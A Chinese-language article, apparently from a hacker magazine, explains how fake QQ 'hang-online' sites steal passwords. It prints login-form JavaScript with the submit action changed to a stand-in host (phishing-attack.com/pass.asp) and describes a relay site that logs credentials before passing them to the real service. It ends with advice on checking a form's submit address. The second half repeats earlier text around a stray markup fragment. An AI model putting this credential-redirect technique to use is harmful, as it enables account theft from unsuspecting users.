不知道從什麼時候開始網絡上就開始興起了掛QQ 的風潮,誰都為了騰訊所謂的等級在不斷的掛Q 掛Q,就連掛著QQ 拿個等級有啥作用也不知道的人,看著別人有自己沒有就感覺特不爽,所以慢慢的掛Q成為了一種時尚,也成為了一種新的業務.網上各種各類的掛QQ網站層出不窮,而且沒有絲毫的減少,但是有沒有人去懷疑你所使用的掛QQ 網站是不是真的安全了?
現在盜取任何聊天軟件的號碼,不外乎就是利用盜號軟件以及鍵盤記錄軟件記錄被種植主機的賬號以及密碼,這種累贅而又需要多方軟件支持的手法已經過時了,而現在行之有效的就是利用無污染(不需要軟件以及任何病毒)去進行的盜取賬號密碼的網絡釣魚攻擊,網絡釣魚已經變成了黑客以及一些不法分子用來進行銀行賬號以及等等相關敏感信息盜取的最有效最快速的途徑,而我們也可以利用網絡釣魚在一夜之間擁有成千上萬的QQ 號以及密碼(甚至於QQ 密保信息).首先釣魚者本身是會仿冒一個掛QQ 的網站頁面,因為要致使訪問者可以相信,所以在仿冒會根據時下最多人訪問的掛QQ 網站進行設計。
仿冒好一個虛假的網站之後,釣魚者本身會想辦法如何去保存所釣到的資料,通常在釣魚網站中都會采取本地記錄相關資料,但是整個用戶的使用流程就會在輸入賬號以及密碼後出現問題,就是說釣魚者自身會想個借口出來說:”該系統因系統繁忙,暫時無法為你服務!”等等的理由,讓被釣者信服,但是現在作為被釣者本身已經不再這麼的愚蠢,所以傳統的釣魚模式已經無法行得通.為了可以使被釣者整個使用流程不會出現任何的懷疑,所以釣魚者會在提交處做一定的手腳.讓我們看看例子:
}
function Login()
{window.open("about:blank","qqLogin",
"width=400,height=300,resizable=no,scrollbars=no,status=no,toolbar=no,menubar=no,location=n
o");
document.QQForm.target = "qqLogin";
document.QQForm.action = "login.asp";
document.QQForm.submit();
}
因為篇幅關系刪除多余語句
從上面的代碼我們可以看到,這是一個正常掛Q網站的登錄頁面代碼,當用戶訪問網站的時候,輸入的賬號以及密碼就會提交給login.asp 頁面,然後再轉去掛Q系統.如果作為釣魚者本身想完美的結合真實的掛Q 網站去完成整個操作流程,那樣子他就必須在這個提交頁面做一些修改,使到被釣者的信息先存儲在自定的地方,然後再轉發到真實的掛Q 網站,所以釣魚者會有可能的把代碼提交的語句修改為:
CODE:
document.QQForm.action = "[url]http://www.phishing-attack.com/pass.asp[/url]";
在這裡我們可以看到釣魚者把提交的數據轉發過去了www.phishing-attack.com的網站,為了避免數據會被發現,所以釣魚者利用中間站記錄用戶所提交的信息.可能大家會問到那整個釣魚過程是怎麼樣的了?我給一個比較簡單的過程大家看看
釣魚網站--------------中間記錄站----------------真實掛Q網站
當用戶訪問的時候,會將密碼提交給釣魚網站,釣魚網站會把數據轉去中間記錄站,然後在中間記錄站進行數據的保存,再次將用戶所提交的數據提交給真實的掛Q網站,這樣子在過程中用戶不單止可以完成整個操作的流程,並且釣魚者本身可以記錄密碼信息延長整個釣魚網站的生命周期(作者注:通常釣魚網站自身的生命周期為15 天).整個思路就是如此了,然而中間站的作用是為了保存信息以及保護信息的安全性,不必擔心當虛假網站被發現時,所保存的數據會被發現,通常這些作為中間站的網站都是釣魚者的傀儡,有可能是被入侵後的,或者利用免費空間或者是只有7 天試用的測試空間作為臨時的中轉.
本文在此就把整個釣魚網站的過程說清楚了,因為內容有一定的危害性,所以把中間站以及真實站之間的技術問題都屏蔽了,大家在使用掛Q網站的時候,請多留心注意一下掛Q網站的首頁源碼,看看提交處的地址和你所使用的網站地址是否一致,如果是一致的話,也不用這麼高興,如果釣魚者本身是在本地記住你的信息,那樣子你還是一樣躲不過被釣的威脅,QQ 等級是否真的比你的號碼還重要,如果你覺得還是等級重要的話,你可以放心的去掛你的QQ,我和玄貓有一句話送給大家:”平平安安網站掛,哭哭啼啼QQ 丟”.請大家看清楚相關的利弊關系別麻木的去相信所謂的掛QQ 網站!本文到此結束,如果對於本文有任何關於防御以提防的地方可以到”非安全—黑客手冊”或者”Bug.Center.Team”詢問!
le="FONT-SIZE: 9px; MARGIN-LEFT: 5px">
}
function Login()
{window.open("about:blank","qqLogin",
"width=400,height=300,resizable=no,scrollbars=no,status=no,toolbar=no,menubar=no,location=n
o");
document.QQForm.target = "qqLogin";
document.QQForm.action = "login.asp";
document.QQForm.submit();
}
因為篇幅關系刪除多余語句
從上面的代碼我們可以看到,這是一個正常掛Q網站的登錄頁面代碼,當用戶訪問網站的時候,輸入的賬號以及密碼就會提交給login.asp 頁面,然後再轉去掛Q系統.如果作為釣魚者本身想完美的結合真實的掛Q 網站去完成整個操作流程,那樣子他就必須在這個提交頁面做一些修改,使到被釣者的信息先存儲在自定的地方,然後再轉發到真實的掛Q 網站,所以釣魚者會有可能的把代碼提交的語句修改為:
CODE:
document.QQForm.action = "[url]http://www.phishing-attack.com/pass.asp[/url]";
在這裡我們可以看到釣魚者把提交的數據轉發過去了www.phishing-attack.com的網站,為了避免數據會被發現,所以釣魚者利用中間站記錄用戶所提交的信息.可能大家會問到那整個釣魚過程是怎麼樣的了?我給一個比較簡單的過程大家看看。